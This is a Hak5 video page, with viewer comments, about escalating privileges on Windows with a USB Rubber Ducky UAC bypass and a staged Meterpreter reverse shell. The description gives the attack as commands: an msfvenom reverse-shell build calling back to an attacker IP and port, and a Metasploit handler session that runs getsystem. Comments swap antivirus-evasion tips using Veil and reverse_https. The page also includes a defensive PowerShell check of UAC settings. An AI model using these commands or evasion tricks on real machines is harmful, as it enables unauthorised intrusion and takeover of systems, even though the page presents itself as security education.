Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117
- Published 9 Feb 2025
- Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.
-------------------------------
Shop: www.hakshop.com
Support: / threatwire
Subscribe: / hak5
Our Site: www.hak5.org
Contact Us: / hak5
------------------------------
Check out / threatwire for our Patreon-only Audio RSS feed of Threat Wire!
git clone github.com/Ski...
cd UAC-D-E-Rubber-Ducky
python uac-duck.py
Upload UAC-Duck-Payload.vbs to your host
Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky
We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute - so check those episodes out.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe
Next we'll upload it to the online host we specified in the Python builder script.
msfconsole
use exploit/multi/handler
set LHOST 192.168.230.133
set LPORT 4444
set ExitOnSession false
exploit -j
sessions
sessions -i 1
shell
whoami
exit
getsystem
shell
whoami
exit
screenshot
github.com/Ski...
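Since the first step of this chain is a UAC bypass, the check a defender wants before worrying about the rest is what UAC level the target is actually running. The PowerShell below is an added example (not code from the episode or the UAC-D-E-Rubber-Ducky project); it reads the policy values that both the Control Panel slider and a GPO write to the same registry key, so it also answers the "UAC configured via GPO" question from the comments. The function name Get-UacPosture is hypothetical.

```powershell
function Get-UacPosture {
    # Added example, not code from the episode or the UAC-D-E-Rubber-Ducky project.
    # UAC policy lives here whether set locally or by Group Policy.
    $path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $path -ErrorAction Stop

    # Windows defaults apply when a value is absent from the key.
    $enableLua  = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $adminMode  = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk = if ($null -ne $p.PromptOnSecureDesktop) { [int]$p.PromptOnSecureDesktop } else { 1 }

    # ConsentPromptBehaviorAdmin: 0 = elevate without prompting, 1/3 = prompt for
    # credentials, 2/4 = prompt for consent, 5 = prompt only for non-Windows
    # binaries (the default). Bypasses that abuse auto-elevation of signed
    # Windows binaries work at 5 (and trivially at 0); at 2 every elevation prompts.
    $autoElevation = ($enableLua -eq 1 -and ($adminMode -eq 5 -or $adminMode -eq 0))

    $advice = if ($enableLua -ne 1) {
        'UAC is disabled; set EnableLUA=1.'
    } elseif ($adminMode -eq 0) {
        'Administrators elevate silently; set ConsentPromptBehaviorAdmin=2 (Always notify).'
    } elseif ($adminMode -eq 5) {
        'Default level; raise to 2 (Always notify) so auto-elevation bypasses prompt the user.'
    } elseif ($adminMode -eq 2) {
        'Always notify; auto-elevation of Windows binaries is off.'
    } else {
        'Non-default GPO level; verify against your baseline.'
    }

    [pscustomobject]@{
        UacEnabled           = ($enableLua -eq 1)
        AdminPromptBehavior  = $adminMode
        SecureDesktopPrompt  = ($secureDesk -eq 1)
        AutoElevationEnabled = $autoElevation
        Recommendation       = $advice
    }
}

Get-UacPosture | Format-List
```

Run it in an elevated or standard PowerShell session on the host you are assessing; reading the key needs no admin rights.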
Enter our December giveaway! Details here: hakshop.com/pa...
Shannon’s going to CES! Gonna have a meetup during the trade show in Vegas: www.facebook.c...
We will be at Shmoocon!
~-~~-~~~-~~-~
Please watch: "Bash Bunny Primer - Hak5 2225"
• Bash Bunny Primer - Ha...
~-~~-~~~-~~-~
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community - where all hackers belong. - Science & Technology
Feeling honored having my generator shown off here, thanks a bunch!! :) Released offline version today much easier and faster to generate! :)
GG bro!
+Siddie Tech
I just download your code. Nice work.
Dude lovely code! Keep up the great work...
Haven't seen this show in a while but glad to see the quality hasn't changed. Great stuff by some great hosts! Thanks!
about that sticker, bière rutten interieurbrouw, it seems to be a word play on the name of an interior designer/company in the Netherlands: Pierre Rutten Interieubouw. In french the words bière and broue = beer. To be more precise broue is the foam on a liquid. They also reversed the original company logo.
Search UA-cam for Pierre Rutten Interieurbouw chainsaw massacre. (Brouw = brew in Dutch.)
She really struggled with that pronunciation!
this is the best episode yet, thank you.
Great episode! Once again thanks guys!
LOVE your videos watch them all keep up the work guys!
Is there more information about the getsystem command, how it works and how it escalates the privilege?
Hi Shannon and Darren. I was watching your videos on how to build a 250g drone since I wanted to build one for myself. But it seems that you guys never got to do the part of converting the drone into a FPV drone. I was wondering if you guys continued the steps on your forums or just something.
If not, would you recommend a website, video forum, etc. where i could get the information to add the fpv add-ons to the drone you guys built. Thanks in advance!
Was the cow session set to UTF-* charset?
So I tried this targeting a 64 bit machine. I had to change the -a to x64 and I also had to change the payload to windows/x64/meterpreter/reverse_tcp ... Everything worked correctly, however when I plugged the ducky into the target machine... It all popped up in powershell... then it successfully hid itself like in the video.... But after waiting for a couple minutes... Nothing happened on my MSF.... No shell was caught? Is there a reason for this? ... I decided to run the command myself, so I copied and pasted it from the duck's .bin file... So I opened powershell and copied and pasted it in, and it came back all red and the error was > "The given path format is not supported"
So... Unrelated question.... I was signed up to be notified when the field kit was available again, I didn't receive an email yet but I did notice that it was possible to back order it right now and I just thought that I would mention to you that it's a good idea to send that email now and let people start paying because money! P. S. I'll be buying mine soon as well!
3:33 what's with that single frame?
samramdebest it's just a frame of Shannon alone in the studio facing the camera
I think something about their workflow does this occasionally, I've seen it before.
Just Shannon getting ready for the show with her good friends Jack Daniels and Sam Adams.
1st. Not a drunk. Just like beer.
2nd. Yeah, it's a glitch in the recording. Haven't had time to fix it and sometimes we miss the glitch while editing.
you're alright.
Question, my win 10 build numbers are in the 10,000 range, what is "1607"?
Would this work if the target in question had UAC configured via GPO? Seems like this would not resolve on a domain-bound computer. Please point it out if I'm wrong. Thanks.
Turning powershell on by default was a mistake. Always disable ms defender via powershell before running payloads.
can't wait for my usb rubber ducky!!!! ordered 2 days ago, but in italy the shipping is slooooooooow
u will love it bro i have one!
MrCoInSanity i'm thinking of buying also a LAN turtle
Guitar Lori Yeah ive been looking at that to and how it works is really cool
MrCoInSanity what are you using your Rubber ducky for?
Guitar Lori
Both the rubber ducky and the LAN turtle are awesome
I'm thinking of getting a pineapple
Great attack. I tested it with DuckHunter HID on a Kali Nethunter Galaxy S5. All the steps are the same except I just load the actual DuckyScript.txt which the phone encodes from there.
I also just hosted the files with SimpleHTTPServer which is already built into Kali. Pretty damn fast attack and so damn effective! I'm impressed and will be using this..
also, a heads up, My 360 Total Security AV did not flag the intrusions but Malwarebytes did.. Not sure what to do about that. Veil-evasion payloads maybe?
Jason Kriewaldt you can also try using reverse_https instead, it doesn't get flagged as often
Angus Stanton that's exactly what I was going to try.. but then got side tracked.. I'll mess with it more later with updates on how a https payload works against malwarebytes.. unless you try it first. ;)
An https payload didn't work for me, not even a veil-evasion created one.. it sent stages but never opened a session... but I tried using veil-evasion with a python/meterpreter/reverse_tcp payload and it worked great, not only did it open without alerting Malwarebytes or AV but it was pretty quick to send me back a session to msfconsole running in a terminal on my nethunter phone.
I literally went from plug in phone to session on phone within 5 seconds of running the script... So amazing.
Where is @Mubix? It's been a while, I miss him...
Edit: I love how after 11 years you guys still explain everything so simply for noobs to understand... xD
I must be dealing with an oddball Windows 7 installation because unless I cd to powershell's directory, powershell commands are not recognized..
Where did you get the golden pineapple in the background?
Why does the date from the computer show 12-15-2016? Is the video old?
I'm running my web host using apache and everything redirects correctly, however when I run the payload on the windows box, it does not give me a shell. I made sure my IPs and ports were correct, and I also made sure all the file names are correct. Could it be that Windows Defender detects bob.exe?
Update: If I allow bob.exe to run with Windows Defender off then the payload works fine. I guess this doesn't work unless Windows Defender is off lol.
I love you guys !!
What type of web server do you have running because don't you have to make a sub domain for ggg.txt r u using Apache? I use nginx and I can't seem to get it to work.
You can host the plaintext on pastebin if you use "/raw/" :)
just bought a USB Rubber Ducky what should I try
Next video show how to get around IDS and IPS and what kinds of things those systems look for in the traffic.
Probably a dumb question, you have to open port 4444 (or whichever was specified in the payload) on the router/firewall the meterpreter machine is sitting behind each time right? Or... leave it open all the time? Is this insecure in any way? Port 4444 on your DSL/Cable modem as well would have to be opened if they have a firewall, correct? Is there an easier way?
Lee Beezy It's a little more than that. If you want to run this on your home network and the objective is not on the same network, the connection must go through your router and end on the 4444 port of your computer. To do this you must configure port redirection on the router (I think that's the name). I recommend renting a cheap server and making tests there, I don't usually like messing around with my router.
Ok thanks, as I thought... Yes, it's tedious fiddling with port filtering/triggering and, I really dislike opening incoming ports to begin with. I've looked at a VPS in the past but remember them being pretty pricey. Is there a cheaper option, maybe one without all the bells and whistles that would suit basic purposes you or anyone would recommend?
Lee Beezy pretty easy to open a port just > go to nat setting > set trigger port and start port to 4444 then direct it to your computer i.p address > enable and save job done .
If you're freaked out by opening a port on your main router (all your main computers' LAN), get a second one and run it through the WAN port of your main router and open the port on this instead (physical network segregation), so any inbound traffic will only have access to your 2nd router on port 4444 and no access to your main router.
You can do what Philip says, but if you wanna try a VPS check this out www.ovh.com/us/vps/vps-ssd.xml It's quite cheap and it's more than enough for starters.
You'll have to 'forward' a port on your router to a port on your local machine. Your payload will then need to refer to the public ip of your router and the port you've opened on that router (LHOST and LPORT).
==> portforward.com for more info on how to forward a port on your router to your local system's port.
==> www.whatismyip.com to see your public IP
Note that most routers have a variable public IP, which can change every day, on each reboot, or practically never. So be sure to double check your public IP every time you want to set up a reverse shell.
Definitely close/disable the port forward when you no longer need it, open ports can lead to vulnerabilities being exploited on your network.
Also, I highly suggest you don't run a listener on a pc that's being used for anything personal. Use a separate pc for that, or like a Raspberry Pi you SSH into.
Better yet would be to rent a VPS where you have control over port forwards etc to keep your home network separated from anything you're trying to do that might be close to less-than-legal.
Could someone help me out? They were talking about having a web server for either routing metasploit or receiving a shell from the exploited shell. I understand DK's AWS website for hosting his files. However, I cannot find a server for this cloud machine to host meterpreter shells. If someone could tell me how to do this or give me a name of a provider that'd be amazing.
One good starting place for learning how to use cloud instances in pen testing (inc. to receive reverse shells) is to play around a bit with the Kali Linux images that are now available in the OS image catalogs on both AWS and Azure. That said, if all you really are looking to do is to use Metasploit to receive and control shells all you need is a Virtual Private Server provider who offers Ubuntu or other common Linux images that Metasploit will work on. Which is all of those providers, essentially. But using a Kali image on AWS or Azure gives you Metasploit and other common tools (and their dependencies) already in place and ready for use.
That's assuming you're already at least somewhat familiar with using Kali locally on your own machine (in a VM) or in a test network environment; if not, you definitely want to get familiar with Kali to some degree on your own equipment before you start worrying about setting up a VPS instance in the cloud and trying out operations over the actual internet.
Are you doing some Fight club style hidden messages? Darren is missing from the frame at 3:33, are you trying to tell us something?
I sensed it, how did you pause it to catch it.
Off point, but what do you all think of USB mice for laptops?
Shannon and Darren look much better than those hipsters on Watch_Dogs 2...
How can i purchase a rubber ducky
Oh yea. The skulls where you get the skill points is the pineapple wifi. Hope you guys still do this when you are 80 years old and just thx
Sorry to be picky but I think you’re thinking about Saturn V rocket not an atlas V rocket
You can also bypass UAC by creating a scheduled task with Admin Privileges just once
nicholas 007 well you need administrator rights once and then you can open your desired exe on startup or a custom trigger
nicholas 007 you should be able to use this web method that opens a new administrator cmd to create a new user and give it administrator privileges
nicholas 007 No you have to have physical access
Look into PDQ deploy!
Hello, how would this attack work from behind a proxy?
Lucas Miguel bulletproof web hosting. Unless it has a static ip and can have a specific port, port forwarded that would be ideal.
AV always kills my MSVenom payloads. I have found that veil evasion is undetected by Windows Defender
You guys are great. I gotta say tho, Metasploit is the Sub7 of the future. lol I gotta say most of what Metasploit automates is too advanced for me as of now anyway. Can you do a show on dll's and maybe how to manually hijack them? I want to know more. :)
So, would this be considered a form of Windows Atom Bombing?
You even do not need a Rubber Ducky to achieve this. It works with a Digispark too. You just need to run different scripts. A Digispark costs 1-3 $.
pentestit.de/digispark-die-usb-rubber-ducky-alternative-teil2/
Oh wow you guys are still doing HAK5 ... I've watched you way back in the beginning, and I'm happy to say I still have a crush on Shannon
What I think sucks about reverse shells is that you leave your IP, like.. hey you found my shell, now come sue me
That promo for domain.com has a lot of "and get this"
hak5 but the content-aware scale gets stronger at 17:07
I have good luck when using veil.
that random glitch at 3:33 lol
Thank you so much ... if only it was possible to ship the rubber ducky to my country, Morocco... I followed up with the tutorial and used an Arduino Micro
Does DK wear contacts or does he have laser vision?
ifconfig is deprecated. Use ip a. It's shorter and correct.
1:44 Darren was so intense while drinking that... XD LOOK AT HIS EYES!
why running screenshot use reversevnc just rc that thing
lol Daron is a kandy kid ! Im really paying mind till now lol... awesome
Hi Darren!
Drunk looking snubs at 3:33
Microsoft called.... Oh thats gonna be a fun call
few rogue frames at 3:33
im seeing that aswell
its actually an accidentally changed angle of filming
yeh it changes to another screen
Maybe it is time to change all of your GNUPG key-chains to 8192 bytes (65536 bits) long keep the hackers out, I hope that this is just for educational purposes only and is not to be used to break the law otherwise you might wind up on Death Row, Stop these hacks use a firewall like PFSense and keep it up to date.
Check your escalation privileges
Washtogs 2! Such a good game
it works
probably should encode that payload... even windows defender will pick up that trojan straight from msfvenom....
1. GetSysInfo gets system data like Darren said. 2nd those were markers, i only know cause we used to have those :D
Did you guys hear about X.exe for privilege escalation?
cool
Love RUBBER DUCKY
check your privileges.
12:35 aardwolf... like the MUD?
Am I the only one who really hates threat wire simply because Patric Norton is an annoying old guy who doesn't know that much about tech and has hopped shows way too much?
Patrick is no longer on Threat Wire. It's now fully produced by me! - Shannon
Oh cool.
Atlas V rocket to the moon? Guess you're confusing Saturn V (1968) and Atlas V (2002). So I believe the Atlas V could reach the moon
Rocket fail 😔🚀
Darren Kitchen Sad Trombone
ok
damn it! samramdebest beat me to it lol 3:33
why does he wear a gang sign haha...
clap
I made it 2.5 second
*claps once*
pls ship to Israel !!!
Thx a lot... I didn't know something like this existed
Stop drinking. That's not cool
I thought it said white privilege escalation lol
doge is first bitches
Doge I love your work :D